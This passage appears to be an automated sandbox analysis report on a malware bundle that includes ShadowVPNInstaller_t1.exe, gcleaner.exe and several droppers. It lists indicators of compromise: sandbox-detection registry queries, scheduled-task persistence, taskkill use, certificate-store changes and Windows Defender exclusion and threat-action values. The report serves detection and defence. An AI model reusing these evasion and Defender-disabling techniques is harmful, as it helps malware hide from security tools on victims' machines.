WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 812 4496 WerFault.exe ShadowVPNInstaller_t1.exe 5484 4284 WerFault.exe Wed15bfd6504f7748c.exe 6032 4284 WerFault.exe Wed15bfd6504f7748c.exe 6020 4496 WerFault.exe ShadowVPNInstaller_t1.exe 5948 4284 WerFault.exe Wed15bfd6504f7748c.exe 5012 4284 WerFault.exe Wed15bfd6504f7748c.exe 5940 4496 WerFault.exe ShadowVPNInstaller_t1.exe 5640 4496 WerFault.exe ShadowVPNInstaller_t1.exe 6312 4496 WerFault.exe ShadowVPNInstaller_t1.exe 6652 4496 WerFault.exe ShadowVPNInstaller_t1.exe 6872 4496 WerFault.exe ShadowVPNInstaller_t1.exe 6076 4284 WerFault.exe Wed15bfd6504f7748c.exe 6164 4284 WerFault.exe Wed15bfd6504f7748c.exe 4860 4284 WerFault.exe Wed15bfd6504f7748c.exe 5412 4284 WerFault.exe Wed15bfd6504f7748c.exe 4744 4284 WerFault.exe Wed15bfd6504f7748c.exe 7832 6304 WerFault.exe GcleanerEU.exe 6416 6304 WerFault.exe GcleanerEU.exe 8108 6304 WerFault.exe GcleanerEU.exe 5032 6304 WerFault.exe GcleanerEU.exe 2648 7768 WerFault.exe gcleaner.exe 5428 8108 WerFault.exe p6qIMjwiMtneHlcgDQwJordB.exe 6600 7768 WerFault.exe gcleaner.exe 7732 6304 WerFault.exe GcleanerEU.exe 8500 1364 WerFault.exe cOSvj6_TfVEcVvnn5pGOY1Gg.exe 8708 7768 WerFault.exe gcleaner.exe 9004 7768 WerFault.exe gcleaner.exe 8176 7768 WerFault.exe gcleaner.exe 8864 7768 WerFault.exe gcleaner.exe 8860 7768 WerFault.exe gcleaner.exe 3868 7768 WerFault.exe gcleaner.exe 1300 5432 WerFault.exe j33PZfVi2SJxBkQ8QMNJtRtd.exe 6008 5432 WerFault.exe j33PZfVi2SJxBkQ8QMNJtRtd.exe 7664 5432 WerFault.exe j33PZfVi2SJxBkQ8QMNJtRtd.exe 8400 5432 WerFault.exe j33PZfVi2SJxBkQ8QMNJtRtd.exe 7840 5432 WerFault.exe j33PZfVi2SJxBkQ8QMNJtRtd.exe 9956 5432 WerFault.exe j33PZfVi2SJxBkQ8QMNJtRtd.exe 5332 5432 WerFault.exe j33PZfVi2SJxBkQ8QMNJtRtd.exe 7712 5432 WerFault.exe j33PZfVi2SJxBkQ8QMNJtRtd.exe 10260 7792 WerFault.exe 2A94.exe -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Wed15edb855a49.exewXZz5xY9daoSOnWFCSX4abIE.exeIX1zGxX9efDhwsZ12BGQ_ajS.tmpaciavihaciavihaciavihdescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed15edb855a49.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wXZz5xY9daoSOnWFCSX4abIE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI IX1zGxX9efDhwsZ12BGQ_ajS.tmp Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI IX1zGxX9efDhwsZ12BGQ_ajS.tmp Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI aciavih Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI aciavih Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI aciavih Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI aciavih Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI aciavih Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed15edb855a49.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wXZz5xY9daoSOnWFCSX4abIE.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI IX1zGxX9efDhwsZ12BGQ_ajS.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI aciavih Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI aciavih Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed15edb855a49.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wXZz5xY9daoSOnWFCSX4abIE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI aciavih Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI aciavih -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Firstoffer.exechoice.exeWed15c2e7469a14dca.exebuild2.exe406F.exesvchost.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Firstoffer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 choice.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Wed15c2e7469a14dca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Wed15c2e7469a14dca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Firstoffer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString choice.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 406F.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 406F.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe -
Creates scheduled task(s) 1 TTPs 20 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 7832 schtasks.exe 8840 schtasks.exe 6044 schtasks.exe 8136 schtasks.exe 4868 schtasks.exe 9092 schtasks.exe 3528 schtasks.exe 9772 schtasks.exe 7060 schtasks.exe 4564 schtasks.exe 7636 schtasks.exe 11152 schtasks.exe 10700 schtasks.exe 7088 schtasks.exe 7832 schtasks.exe 10896 schtasks.exe 4800 schtasks.exe 8016 schtasks.exe 10924 schtasks.exe 6880 schtasks.exe -
Delays execution with timeout.exe 6 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 5548 timeout.exe 3204 timeout.exe 6352 timeout.exe 8496 timeout.exe 4472 timeout.exe 10348 timeout.exe -
Download via BitsAdmin 1 TTPs 2 IoCs
-
Enumerates system info in registry 2 TTPs 9 IoCs
Processes:
Install.exechrome.exeInstall.exerundll32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Kills process with taskkill 20 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 10716 taskkill.exe 10696 taskkill.exe 8420 taskkill.exe 6396 taskkill.exe 5736 taskkill.exe 9204 taskkill.exe 6768 taskkill.exe 6304 taskkill.exe 7740 taskkill.exe 5924 taskkill.exe 8928 taskkill.exe 5792 taskkill.exe 4448 taskkill.exe 5368 taskkill.exe 5768 taskkill.exe 7648 taskkill.exe 7840 taskkill.exe 8736 taskkill.exe 6912 taskkill.exe 11116 taskkill.exe -
Processes:
Igfukue.exeOneDriveSetup.exebrowser_broker.exebrowser_broker.exebrowser_broker.exeforfiles.exeMicrosoftEdgeCP.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Igfukue.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch Igfukue.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main forfiles.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
svchost.exepowershell.exepowershell.exepowershell.exepowershell.exerundll32.execmd.exebXhtqdI.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{2F3FD395-9A65-4A4D-8C11-4F29AB627EB9}Machine\SOFTWARE rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5ad12640-0000-0000-0000-500600000000}\NukeOnDelete = "0" bXhtqdI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" bXhtqdI.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{2F3FD395-9A65-4A4D-8C11-4F29AB627EB9}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\EHjpVGHxoTMU2 = "0" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{2F3FD395-9A65-4A4D-8C11-4F29AB627EB9}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\mlmrxyCihFugMjhe = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{2F3FD395-9A65-4A4D-8C11-4F29AB627EB9}Machine rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{2F3FD395-9A65-4A4D-8C11-4F29AB627EB9}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{2F3FD395-9A65-4A4D-8C11-4F29AB627EB9}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction\242872 = "6" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{2F3FD395-9A65-4A4D-8C11-4F29AB627EB9}Machine\SOFTWARE\Policies\Microsoft rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{2F3FD395-9A65-4A4D-8C11-4F29AB627EB9}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction\2147737503 = "6" rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{2F3FD395-9A65-4A4D-8C11-4F29AB627EB9}Machine\SOFTWARE\Policies rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5ad12640-0000-0000-0000-500600000000}\MaxCapacity = "15150" bXhtqdI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" bXhtqdI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe -
Modifies registry class 64 IoCs
Processes:
OneDriveSetup.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeforfiles.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7} OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\TypeLib\{F904F88C-E60D-4327-9FA2-865AD075B400} OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Rating Prompt Shown = "0" MicrosoftEdge.exe Key deleted \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_CLASSES\OOBEREQUESTHANDLER.OOBEREQUESTHANDLER.1\CLSID OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\TypeLib\{4B1C80DA-FA45-468F-B42B-46496BDBE0C5}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\\3" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\OOBERequestHandler.OOBERequestHandler\CLSID\ = "{94269C4E-071A-4116-90E6-52E557067E4E}" OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "1086" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\ProgID\ = "FileSyncCustomStatesProvider.FileSyncCustomStatesProvider.1" OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key deleted \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\CLSID\{6bb93b4e-44d8-40e2-bd97-42dbcf18a40f} OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_CLASSES\WOW6432NODE\INTERFACE\{EE15BBBB-9E60-4C52-ABCB-7540FF3DF6B3}\PROXYSTUBCLSID32 OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_CLASSES\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\LOCALSERVER32 OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\TypeLib\{082D3FEC-D0D0-4DF6-A988-053FECE7B884} OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "1090" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" forfiles.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com\Total = "477" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates\4EEF7FAF0062D34AB MicrosoftEdge.exe Key deleted \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_CLASSES\WOW6432NODE\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\VERSIONINDEPENDENTPROGID OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\Interface\{50487D09-FFA9-45E1-8DF5-D457F646CD83}\TypeLib OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "1081" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Key deleted \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc} OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\CLSID\{A3CA1CF4-5F3E-4AC0-91B9-0D3716E1EAC3} OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Interface\{50487D09-FFA9-45E1-8DF5-D457F646CD83}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344} OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}\ = "IGetSyncStatusCallback" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C} OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.170.0822.0002\\FileCoAuth.exe\"" OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\odopen OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local 